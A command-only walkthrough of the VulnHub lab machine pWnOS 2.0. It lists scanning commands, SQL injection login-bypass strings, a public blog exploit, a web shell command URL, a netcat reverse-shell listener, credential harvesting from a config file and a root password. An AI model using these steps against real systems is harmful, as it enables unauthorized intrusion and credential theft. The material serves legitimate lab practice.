VulnHub: pWnOS: 2.0 (Pre-Release)

nmap -sn 10.10.10.200/24
nmap -Pn 10.10.10.100nmap -Pn -p1000- 10.10.10.100
nmap -A -p22,80 10.10.10.100
nmap --script vuln -p22,80 10.10.10.100
ssh 10.10.10.100
nikto -h http://10.10.10.100
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.100/ -x php,txt,html,sh,cgi,bak -q
1' or 1=1--   -> failed
1' or 1=1-- - -> failed
1' or 1=1--+ -> failed
1' or 1=1# -> succeeded
searchsploit -m 1191
./1191.pl
./1191.pl -h http://10.10.10.100/blog -e 1
http://10.10.10.100/blog/images/cmd.php?cmd=id
rlwrap nc -lvp 443
/var/www/var/var/logs/var/backups/var/mail/home//opt/tmp
cd /var/wwwls -la
cat /var/www/mysqli_connect.php
cd /var/ls -la
cat /var/mysqli_connect.php
su rootpassword: goodday
su rootpassword: goodday
whoami

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store